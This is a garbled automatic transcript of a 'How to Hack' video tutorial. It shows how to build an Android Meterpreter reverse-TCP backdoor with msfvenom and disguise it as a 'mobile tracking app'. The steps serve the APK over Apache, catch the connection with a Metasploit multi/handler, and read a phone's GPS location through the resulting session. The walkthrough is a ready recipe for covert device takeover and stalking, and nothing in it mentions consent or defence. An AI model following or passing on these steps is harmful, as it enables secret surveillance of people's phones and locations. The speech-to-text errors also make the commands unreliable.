Would you like to inspect the original subtitles? These are the user uploaded subtitles that are being translated: 1 00:00:11,900 --> 00:00:14,150 Hi and welcome back to another episode on How to Hack. 2 00:00:14,630 --> 00:00:19,550 So today we'll be discussing about how we can quickly create a mobile application that could help us 3 00:00:19,550 --> 00:00:21,740 track the location of a device. 4 00:00:22,190 --> 00:00:26,690 So, of course, on the left side, I have a mobile phone running and on the right side I have a Linux 5 00:00:26,690 --> 00:00:27,110 server. 6 00:00:27,470 --> 00:00:31,930 And of course, it is Linux server is called Linux, so we can go ahead and open up terminal. 7 00:00:32,090 --> 00:00:35,480 So all we got to do is go ahead and enter MSA venom. 8 00:00:35,480 --> 00:00:41,420 So this will be the tool that we're using to create the mobile application so we can turn up for a platform 9 00:00:41,450 --> 00:00:48,280 followed by Android Meta Preeta Slash Reverse Underscore TCP and we can enter Delvaux equal. 10 00:00:48,290 --> 00:00:55,130 So this is listening IP address of your server so we can open a terminal here and we can enter IP ADR 11 00:00:55,130 --> 00:00:57,240 to file the IP address of the server. 12 00:00:57,260 --> 00:00:57,980 So here we go. 13 00:00:58,000 --> 00:01:04,040 The IP address of wanting to one six eight zero one zero six so we can copy deselection, go back to 14 00:01:04,040 --> 00:01:08,900 the previous terminal and you can paste a selection here and we can enter airport equiv four four four 15 00:01:08,900 --> 00:01:09,220 four. 16 00:01:09,770 --> 00:01:15,770 So of course we can all put the information into a mobile application so we can enter mobile tracking 17 00:01:15,980 --> 00:01:18,230 at a hit enter and debt. 18 00:01:18,620 --> 00:01:21,140 And that would be gained a generation of to Paillot. 19 00:01:21,140 --> 00:01:24,370 So you could take some time for the generation of people to complete. 20 00:01:24,410 --> 00:01:28,550 So we'll wait for the completion of the Paillot to be created. 21 00:01:28,910 --> 00:01:32,300 So this is the file that we actually serve into the mobile application. 22 00:01:32,330 --> 00:01:38,150 So in this case, we got a payload complete IT services pallet size ten thousand one hundred eighty 23 00:01:38,150 --> 00:01:38,780 seven bytes. 24 00:01:39,140 --> 00:01:45,110 So all we got to do is under pseudo followed by move to actually change, to fall from the current directory 25 00:01:45,110 --> 00:01:51,800 to another directory so we can actually enter pseudo and the Willowby mobile tracking app and we can 26 00:01:51,800 --> 00:01:54,140 change you to see var html. 27 00:01:54,890 --> 00:02:01,430 And this would actually transfer to fall from the current working directory all the way into Devar HTML, 28 00:02:01,730 --> 00:02:04,410 which is of course use for your Web application server. 29 00:02:04,430 --> 00:02:09,950 So again, you could use different ways of sharing the mobile app to the mobile device. 30 00:02:10,340 --> 00:02:15,140 So of course over here all we got to do is actually do a pseudo system CTL and we can enter status, 31 00:02:15,140 --> 00:02:15,830 Apache to. 32 00:02:16,280 --> 00:02:21,440 So Apache to is the web application server they were using to serve the mobile app that we have just 33 00:02:21,440 --> 00:02:21,940 created. 34 00:02:21,950 --> 00:02:25,470 So in this case we can see that we got the Apache to running. 35 00:02:25,490 --> 00:02:26,980 So it's active and running. 36 00:02:27,380 --> 00:02:31,180 So all we could do is to actually go into MSF console. 37 00:02:31,370 --> 00:02:36,680 So once you hit MSV console, that would actually start up Matus supply framework that would allow us 38 00:02:36,860 --> 00:02:40,820 a connection back into the machine once we have a listener started. 39 00:02:41,390 --> 00:02:44,500 So all we got to do is to make sure that we enter the following. 40 00:02:44,510 --> 00:02:48,190 So use exploit multi handler. 41 00:02:48,440 --> 00:02:52,790 So once you got this running, all you got to do remember to payload that we use earlier, which was 42 00:02:52,790 --> 00:02:59,030 a Android meter to reverse TCP, so we got to set the payload as Android. 43 00:02:59,360 --> 00:03:06,320 Mr Preeta reverse on a scale TCP hit enter in debt and from this we can enter show options to see what 44 00:03:06,320 --> 00:03:07,520 are the options available. 45 00:03:07,940 --> 00:03:15,110 So once again we can set the low so I can copy the alehouse from the iPad address that we actually specified 46 00:03:15,110 --> 00:03:15,500 earlier. 47 00:03:15,500 --> 00:03:21,020 So copy to selection and of course we can set Alehouse and we can do a piece of the bot. 48 00:03:21,020 --> 00:03:22,700 So Pace and hit enter on that. 49 00:03:23,060 --> 00:03:24,610 And of course we've got a L pod, right? 50 00:03:24,650 --> 00:03:30,050 So of course we got all our information, insight, insight, framework frameworks I'm going to do is 51 00:03:30,050 --> 00:03:34,400 to just simply enter, exploit and that would begin listening for any connections. 52 00:03:35,210 --> 00:03:41,000 So with that in mind, going into the left side of the screen, we have our mobile application and of 53 00:03:41,000 --> 00:03:45,560 course, we can open up, say, Chrome, and we can go into the Web application server to actually download 54 00:03:45,560 --> 00:03:45,980 default. 55 00:03:46,550 --> 00:03:52,580 So we can actually go into the IP address of the colonics machine that is hosting the Web application 56 00:03:52,580 --> 00:03:53,000 server. 57 00:03:53,510 --> 00:03:58,100 And from here, all you could do is to actually do a slash and we can download a fall. 58 00:03:58,850 --> 00:04:04,250 So if you remember earlier from the earlier part of how we are actually changing to fall in a filename, 59 00:04:04,700 --> 00:04:06,650 we can actually enter mobile tracking app. 60 00:04:07,460 --> 00:04:07,810 All right. 61 00:04:08,060 --> 00:04:13,420 So from here, we can enter mobile tracking app ABQ to download a fall. 62 00:04:13,730 --> 00:04:15,500 So this will beginning to fall. 63 00:04:15,500 --> 00:04:18,580 So as you can see over here, we can open up the application. 64 00:04:18,590 --> 00:04:22,610 So once you open the application, it will say, do you want to install this application? 65 00:04:22,610 --> 00:04:23,840 So you click install on that. 66 00:04:24,080 --> 00:04:26,210 And this would be Gane installation process. 67 00:04:26,450 --> 00:04:31,640 And all you got to do is, of course, now scrolling back down, we can get a supply list in a server 68 00:04:31,640 --> 00:04:31,970 running. 69 00:04:32,120 --> 00:04:34,400 All you got to do is open up the application. 70 00:04:34,760 --> 00:04:39,170 And this would give us, of course, immediate access into the mobile device. 71 00:04:39,170 --> 00:04:44,030 So, of course, in this case, if we want to track location, make sure that the application is allow 72 00:04:44,180 --> 00:04:46,970 to actually access the location of this device. 73 00:04:47,120 --> 00:04:53,120 So you click continue on that and immediately, would it have ability to actually have a session with 74 00:04:53,120 --> 00:04:54,160 the mobile application? 75 00:04:54,560 --> 00:04:55,970 So from here we can enter help. 76 00:04:55,970 --> 00:04:57,980 Now we can see all of the commands available. 77 00:04:58,430 --> 00:05:01,130 So of course the one day will be using is the geolocation. 78 00:05:01,520 --> 00:05:04,670 So of course over here there are a number of ways that we can do it. 79 00:05:04,670 --> 00:05:08,240 So one is geolocation and other is wireless LAN geolocation. 80 00:05:08,570 --> 00:05:10,010 So of course we can actually look. 81 00:05:10,140 --> 00:05:16,280 At getting the lat long using geolocation so we can go and enter Geo, locate and hit enter on that. 82 00:05:18,600 --> 00:05:23,940 And this would give us the latitude and longitude of the longitude of the device so we can go ahead 83 00:05:23,940 --> 00:05:25,290 and open up a Web browser. 84 00:05:25,740 --> 00:05:28,680 And in the Web browser, we can say go to Google Maps. 85 00:05:29,160 --> 00:05:34,030 And once we were in Google Maps, all you got to do is to keep the latitude as who has the longitude. 86 00:05:34,440 --> 00:05:39,340 So, of course, going back here into the terminal, we can actually copy the information over here. 87 00:05:39,360 --> 00:05:44,970 So this is the first latitude that we want to select and we paste the information over here and we go 88 00:05:44,970 --> 00:05:50,610 back into terminal and we actually select over here, which is the longitude and copy to selection so 89 00:05:50,610 --> 00:05:53,970 we can do a comma followed by page and we can do a search on that. 90 00:05:54,120 --> 00:05:57,380 And that would immediately tell us the location of the place. 91 00:05:57,390 --> 00:06:01,620 So of course, in this case, you'll be seeing over here that we have the current location and this 92 00:06:01,620 --> 00:06:06,730 is a place somewhere in somewhere in the United States. 93 00:06:06,750 --> 00:06:10,530 So here we can see, of course, the information based on the latitude and longitude. 94 00:06:10,740 --> 00:06:16,650 And the reason is because when you go into the virtualization of the device, we can actually click 95 00:06:16,650 --> 00:06:17,130 on more. 96 00:06:17,280 --> 00:06:20,040 And this is the place where we can actually set a single point. 97 00:06:20,070 --> 00:06:24,080 So this is the location that we can set inside of virtualization. 98 00:06:24,090 --> 00:06:28,920 So, of course, if you want to learn more about how we could set and change the location of device, 99 00:06:29,100 --> 00:06:31,410 we could discuss on that in subsequent videos. 100 00:06:31,770 --> 00:06:35,070 So once again, I hope you have learned something valuable in today's tutorial. 101 00:06:35,280 --> 00:06:38,610 And if I have any questions, feel free to leave a comment below Armalite share. 102 00:06:38,620 --> 00:06:42,270 Subscribe the channel so that you can be kept abreast of the latest cyber security target. 103 00:06:42,420 --> 00:06:43,860 Thank you so much once again for watching. 11122